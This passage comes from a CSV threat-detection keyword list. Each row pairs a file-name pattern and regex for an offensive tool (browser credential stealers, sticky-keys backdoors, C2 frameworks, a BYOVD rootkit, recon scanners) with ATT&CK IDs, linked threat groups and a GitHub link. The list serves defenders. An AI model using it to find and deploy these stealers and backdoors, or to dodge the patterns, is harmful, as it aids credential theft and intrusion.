T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11667" "*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","11668" "*/Stealer.exe*",".{0,1000}\/Stealer\.exe.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","1","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","11669" "*/Stealer.sln*",".{0,1000}\/Stealer\.sln.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","1","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","11670" "*/stext credentials.log*",".{0,1000}\/stext\scredentials\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - 
TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","#linux","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","11671" "*/stickykey.ps1*",".{0,1000}\/stickykey\.ps1.{0,1000}","offensive_tool_keyword","Persistence-Accessibility-Features","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/Ignitetechnologies/Persistence-Accessibility-Features","1","1","N/A","N/A","9","1","34","12","2020-05-18T05:59:58Z","2020-05-18T05:59:23Z","11672" "*/Stickykeys.sh*",".{0,1000}\/Stickykeys\.sh.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","1","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","11673" "*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","11674" "*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - 
TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","11675" "*/StickyNotesExtract.exe*",".{0,1000}\/StickyNotesExtract\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","11676" "*/stinger_client.py*",".{0,1000}\/stinger_client\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","11677" "*/Stompy.git*",".{0,1000}\/Stompy\.git.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11678" 
"*/Stompy.ps1*",".{0,1000}\/Stompy\.ps1.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11679" "*/StomPY.py*",".{0,1000}\/StomPY\.py.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","1","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","11680" "*/Stowaway.git*",".{0,1000}\/Stowaway\.git.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","1","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11681" "*/stowaway_admin*",".{0,1000}\/stowaway_admin.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11682" "*/stowaway_agent*",".{0,1000}\/stowaway_agent.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#linux","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","11683" "*/Stracciatella/releases/latest/download/Stracciatella.exe*",".{0,1000}\/Stracciatella\/releases\/latest\/download\/Stracciatella\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - 
T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","11684" "*/striker.c",".{0,1000}\/striker\.c","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11685" "*/Striker.git*",".{0,1000}\/Striker\.git.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11686" "*/striker.local*",".{0,1000}\/striker\.local.{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","N/A","10","10","301","42","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z","11687" "*/striker.py",".{0,1000}\/striker\.py","offensive_tool_keyword","cobaltstrike","This project is 'bridge' 
between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","11688" "*/string_of_paerls.profile*",".{0,1000}\/string_of_paerls\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","11689" "*/stun-info.nse*",".{0,1000}\/stun\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11690" "*/stun-version.nse*",".{0,1000}\/stun\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11695" "*/stuxnet-detect.nse*",".{0,1000}\/stuxnet\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11696" "*/subbrute.git*",".{0,1000}\/subbrute\.git.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11697" "*/subbrute.py*",".{0,1000}\/subbrute\.py.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11698" "*/subbrute/releases/download/*",".{0,1000}\/subbrute\/releases\/download\/.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","1","N/A","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","11699" "*/subdomain.yaml*",".{0,1000}\/subdomain\.yaml.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation tool","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","N/A","10","5566","907","2025-04-22T14:57:07Z","2018-11-10T04:17:18Z","11700" 
"*/subdomains.txt*",".{0,1000}\/subdomains\.txt.{0,1000}","offensive_tool_keyword","dnscan","dnscan is a python wordlist-based DNS subdomain scanner.","T1595 - T1595.002 - T1018 - T1046","TA0007 - TA0043","N/A","N/A","Reconnaissance","https://github.com/rbsec/dnscan","1","0","#linux","N/A","6","10","1193","410","2024-12-17T15:29:50Z","2013-03-13T10:42:07Z","11701" "*/subdomains_n0kovo_big.txt*",".{0,1000}\/subdomains_n0kovo_big\.txt.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","11702" "*/subdomains-10000.txt*",".{0,1000}\/subdomains\-10000\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","#linux","N/A","6","10","N/A","N/A","N/A","N/A","11703" "*/subdomains-top1mil-110000.txt*",".{0,1000}\/subdomains\-top1mil\-110000\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","11704" "*/subdomains-top1mil-5000.txt*",".{0,1000}\/subdomains\-top1mil\-5000\.txt.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and 
active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#linux","N/A","5","","N/A","","","","11705" "*/Sublist3r*",".{0,1000}Sublist3r.{0,1000}","offensive_tool_keyword","Sublist3r","Sublist3r is a python tool designed to enumerate subdomains of websites using OSINT. It helps penetration testers and bug hunters collect and gather subdomains for the domain they are targeting. Sublist3r enumerates subdomains using many search engines such as Google. Yahoo. Bing. Baidu and Ask. Sublist3r also enumerates subdomains using Netcraft. Virustotal. ThreatCrowd. DNSdumpster and ReverseDNS. subbrute was integrated with Sublist3r to increase the possibility of finding more subdomains using bruteforce with an improved wordlist. The credit goes to TheRook who is the author of subbrute.","T1210.001 - T1190 - T1574.001","TA0007 - TA0002 - TA0010","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/aboul3la/Sublist3r","1","1","N/A","N/A","5","10","10300","2148","2024-08-02T00:00:30Z","2015-12-15T00:55:25Z","11706" "*/submit_to_nemesis.py*",".{0,1000}\/submit_to_nemesis\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11707" "*/submit_to_nemesis.sh*",".{0,1000}\/submit_to_nemesis\.sh.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11708" "*/submit_to_nemesis.yaml*",".{0,1000}\/submit_to_nemesis\.yaml.{0,1000}","offensive_tool_keyword","nemesis","An offensive 
data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","11709" "*/Suborner.git*",".{0,1000}\/Suborner\.git.{0,1000}","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","9","5","469","58","2024-11-20T01:34:44Z","2022-04-26T00:12:58Z","11710" "*/sudo_tracer.c*",".{0,1000}\/sudo_tracer\.c.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","#linux","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","11711" "*/sudoers.d/reconFTW*",".{0,1000}\/sudoers\.d\/reconFTW.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","11712" "*/sudomy.api*",".{0,1000}\/sudomy\.api.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - 
T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","11713" "*/sullo/nikto*",".{0,1000}\/sullo\/nikto.{0,1000}","offensive_tool_keyword","nikto","Nikto web scanner tool","T1210.001 - T1190 - T1046 - T1222","TA0007 - TA0002 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/sullo/nikto","1","1","#linux","N/A","N/A","10","9184","1306","2025-02-22T14:30:28Z","2012-11-24T04:24:29Z","11714" "*/sunder.exe*",".{0,1000}\/sunder\.exe.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","11715" "*/sunlogin_rce*",".{0,1000}\/sunlogin_rce.{0,1000}","offensive_tool_keyword","POC","SunloginClient RCE vulnerable version","T1587","TA0001 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/sunlogin_rce","1","1","N/A","N/A","N/A","5","484","195","2022-02-16T16:11:42Z","2022-02-16T14:20:41Z","11716" "*/Suntour.ps1*",".{0,1000}\/Suntour\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","11717" "*/Sup3r-Us3r/scripts/*",".{0,1000}\/Sup3r\-Us3r\/scripts\/.{0,1000}","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential 
Access","https://raw.githubusercontent.com/Sup3r-Us3r/scripts/master/fb-brute.pl","1","1","N/A","N/A","7","10","N/A","N/A","N/A","N/A","11728" "*/supermicro-ipmi-conf.nse*",".{0,1000}\/supermicro\-ipmi\-conf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","11729" "*/Supernova.exe*",".{0,1000}\/Supernova\.exe.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","11730" "*/Supernova.git*",".{0,1000}\/Supernova\.git.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","1","N/A","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","11731" "*/SuperProfileDLL*",".{0,1000}\/SuperProfileDLL.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","11732" "*/Supershell.tar.gz*",".{0,1000}\/Supershell\.tar\.gz.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11733" "*/supershell/login/auth*",".{0,1000}\/supershell\/login\/auth.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1561","196","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z","11734" "*/Supershell/releases*",".{0,1000}\/Supershell\/releases.{0,1000}","offensive_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. 
